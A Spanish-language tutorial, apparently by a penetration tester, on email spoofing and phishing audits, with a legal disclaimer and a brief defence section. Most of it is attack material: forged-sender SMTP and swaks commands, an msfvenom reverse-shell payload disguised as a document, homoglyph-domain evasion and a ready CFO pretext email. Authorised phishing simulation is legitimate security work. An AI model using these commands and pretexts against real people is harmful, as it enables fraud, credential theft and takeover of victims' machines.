Cómo Realizar un Ejercicio de Suplantación de Correo Electrónico (Email Spoofing)

El mes pasado, durante una auditoría de seguridad para un cliente en Quito, logré que el 70% de los empleados hiciera clic en un enlace malicioso que supuestamente venía del CEO de la empresa. El email parecía completamente legítimo, con el dominio correcto, firma corporativa, y hasta el tono de escritura característico del jefe.

DISCLAIMER LEGAL IMPORTANTE: Este tutorial está dirigido exclusivamente a profesionales de seguridad informática, pentesters autorizados, y auditores que trabajen con autorización explícita y por escrito. El email spoofing sin autorización es ILEGAL y puede resultar en consecuencias criminales graves. No soy responsable del mal uso de esta información. Si no tienes autorización explícita, no sigas leyendo.

¿Qué es email spoofing y por qué deberías conocerlo?

Email spoofing es la técnica de falsificar el remitente de un correo electrónico para que parezca venir de otra persona o dominio. Es como usar una máscara digital: el email llega a la bandeja de entrada aparentando ser de alguien confiable, pero en realidad viene de un atacante.

Como profesional de seguridad, necesitas entender esta técnica por dos razones:

• Para evaluar la vulnerabilidad de tu organización ante estos ataques
• Para educar a usuarios sobre cómo identificar emails sospechosos

La realidad es deprimente: la mayoría de usuarios no puede distinguir un email legítimo de uno falso. Y los atacantes lo saben.

La anatomía de un email: headers que importan

Para entender cómo funciona el spoofing, necesitas conocer la estructura de un email. Los headers más importantes son:

From: CEO <ceo@empresa.com>
Reply-To: ceo@empresa.com  
Return-Path: <atacante@servidor-malicioso.com>
Message-ID: <12345@empresa.com>
Received: from mail.empresa.com by servidor.destino.com

El truco está en que el header From (lo que ve el usuario) puede ser completamente falso, mientras que Return-Path y Received muestran el origen real. La mayoría de usuarios nunca revisa estos headers.

Método 1: Spoofing básico con telnet

El método más básico usa telnet para conectarse directamente a un servidor SMTP. Es rudimentario pero efectivo para entender los fundamentos:

# Conectar al servidor SMTP objetivo
telnet mail.objetivo.com 25

# Comandos SMTP básicos
HELO atacante.com
MAIL FROM: <ceo@empresa.com>
RCPT TO: <victima@empresa.com>
DATA
From: CEO <ceo@empresa.com>
To: victima@empresa.com
Subject: Urgente: Transferencia bancaria

Necesito que hagas una transferencia urgente...

.
QUIT

Este método funciona solo contra servidores SMTP mal configurados que no validan el remitente. Cada vez son menos, pero todavía existen.

Método 2: Usando herramientas especializadas

Swaks: la navaja suiza del email testing

Swaks (Swiss Army Knife for SMTP) es mi herramienta favorita para este tipo de pruebas:

# Instalación en Linux
sudo apt install swaks

# Email spoofing básico
swaks --to victima@empresa.com 
      --from ceo@empresa.com 
      --server mail.objetivo.com 
      --header "Subject: Reunión urgente" 
      --body "Necesito verte en mi oficina inmediatamente"

# Con autenticación SMTP (si tienes credenciales comprometidas)
swaks --to victima@empresa.com 
      --from ceo@empresa.com 
      --server smtp.empresa.com 
      --auth-user usuario@empresa.com 
      --auth-password password123 
      --header "Subject: Cambio de políticas" 
      --attach archivo_malicioso.pdf

Gophish: para campañas completas

Para auditorías más elaboradas, Gophish permite crear campañas completas de phishing con tracking:

# Instalación
wget https://github.com/gophish/gophish/releases/download/v0.11.0/gophish-v0.11.0-linux-64bit.zip
unzip gophish-v0.11.0-linux-64bit.zip
chmod +x gophish
./gophish

Gophish incluye templates, tracking de clicks, captura de credenciales, y reportes detallados. Es la herramienta profesional para este tipo de evaluaciones.

Bypassing protecciones comunes

SPF, DKIM y DMARC: los guardianes del email

Los dominios bien configurados implementan estas protecciones:

• SPF: Define qué servidores pueden enviar email desde el dominio
• DKIM: Firma criptográficamente los emails
• DMARC: Define qué hacer con emails que fallan SPF/DKIM

Para verificar estas protecciones:

# Verificar registros SPF
dig TXT empresa.com | grep spf

# Verificar DMARC
dig TXT _dmarc.empresa.com

# Verificar DKIM (selector común)
dig TXT selector1._domainkey.empresa.com

Técnicas de evasión

Cuando las protecciones están activas, necesitas ser más creativo:

• Dominios similares: empresa.co en lugar de empresa.com
• Subdominios: noreply.empresa-oficial.com
• Caracteres Unicode: еmpresa.com (con е cirílica)
• Display name spoofing: "CEO" <atacante@dominio-malo.com>

En una auditoría reciente, registré el dominio "empresa-oficial.com" y configuré SPF/DKIM correctamente. Los emails pasaron todos los filtros porque técnicamente venían de un dominio legítimo, aunque no era el correcto.

Construcción de emails convincentes

Ingeniería social efectiva

El spoofing técnico es solo la mitad de la ecuación. El contenido debe ser convincente:

• Urgencia: "Necesito esto antes de las 5 PM"
• Autoridad: Firmar como CEO, CFO, o IT Director
• Contexto actual: Referencias a eventos reales de la empresa
• Mimics del estilo: Copiar el tono de comunicación habitual

Ejemplo de email efectivo que usé en una auditoría:

From: Ricardo Mendoza <rmendoza@empresa.com>
Subject: Re: Cambios en política de gastos - URGENTE

Hola Maria,

Por favor revisa el documento adjunto con los nuevos límites 
de gastos que entran en vigor mañana. Necesito que lo 
implementes en el sistema antes del cierre del día.

Cualquier duda, llámame al celular.

Saludos,
Ricardo

--
Ricardo Mendoza
CFO - Empresa XYZ
Tel: +593 99 123 4567

Recolección de inteligencia (OSINT)

Antes de enviar emails, recopila información sobre la organización:

• LinkedIn: Nombres, cargos, relaciones jerárquicas
• Sitio web corporativo: Estructura organizacional, eventos recientes
• Redes sociales: Estilo de comunicación, intereses personales
• Google dorks: Documentos internos expuestos accidentalmente

Implementación de una auditoría completa

Fase 1: Reconocimiento

# Enumerar empleados y emails
theharvester -d empresa.com -l 500 -b google,linkedin,bing

# Verificar protecciones de email
python3 spoofcheck.py empresa.com

# Identificar servidores de email
dig MX empresa.com

Fase 2: Preparación del ataque

# Configurar servidor de phishing
python3 -m http.server 8080

# Configurar DNS para dominio spoofed
# (esto requiere dominio propio)

# Preparar payloads
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe -o documento.exe

Fase 3: Ejecución controlada

En auditorías reales, empiezo con un grupo pequeño de usuarios (5-10) para validar la efectividad antes de expandir la campaña. Esto permite ajustar la estrategia sin comprometer toda la organización.

Casos de estudio reales

Caso 1: Empresa financiera en Quito

Objetivo: 150 empleados Método: Email del CEO solicitando verificación de credenciales Resultado: 68% de tasa de clic, 34% proporcionó credenciales La empresa no tenía DMARC configurado. Los emails pasaron todos los filtros. Implementaron training de seguridad después de la auditoría.

Caso 2: Universidad privada

Objetivo: Personal administrativo Método: Email de "IT Support" sobre actualización de sistema Resultado: 82% de tasa de clic, 45% instaló "actualización" maliciosa El factor clave fue usar información específica sobre el sistema de gestión académica que obtuve del sitio web público.

Defensa contra email spoofing

Controles técnicos

• Implementar SPF, DKIM, DMARC: Con política estricta (p=reject)
• Filtros anti-phishing: Soluciones como Proofpoint, Mimecast
• Sandboxing: Análisis de attachments en entorno aislado
• Banner de advertencia: Para emails externos

Controles humanos

• Training regular: Simulacros de phishing mensuales
• Verificación out-of-band: Confirmar solicitudes urgentes por teléfono
• Políticas claras: Procedimientos para transferencias, cambios de datos bancarios

Herramientas adicionales del arsenal

Para reconocimiento

• theHarvester: Recopilación de emails y información
• Maltego: Mapping de relaciones organizacionales
• recon-ng: Framework de reconocimiento modular

Para ejecución

• SET (Social Engineer Toolkit): Suite completa de herramientas
• King Phisher: Alternativa a Gophish
• Evilginx: Para bypass de 2FA

Aspectos legales y éticos

No puedo enfatizar esto suficiente: estas técnicas deben usarse SOLO con autorización explícita. En Ecuador, como en la mayoría de países, el spoofing sin autorización puede constituir:

• Suplantación de identidad
• Fraude informático
• Violación de sistemas informáticos

Siempre trabajo con contratos claros que especifican alcance, métodos permitidos, y limitaciones. La documentación es crucial para protegerse legalmente.

Limitaciones y consideraciones

Email spoofing no es infalible. Los filtros modernos son cada vez mejores, y los usuarios más educados. Algunos factores limitantes:

• Filtros basados en IA: Detectan patrones anómalos en contenido
• Análisis de comportamiento: Detectan comunicaciones fuera de patrones normales
• Verificación multi-factor: Reduce impacto de credenciales comprometidas

Además, las organizaciones maduras implementan procedimientos que hacen más difícil explotar emails spoofed, como verificación telefónica para transacciones financieras.

¿Has implementado defensas contra email spoofing en tu organización? ¿Qué técnicas han resultado más efectivas? En mis auditorías, he notado que el factor humano sigue siendo el eslabón más débil, independientemente de las protecciones técnicas implementadas.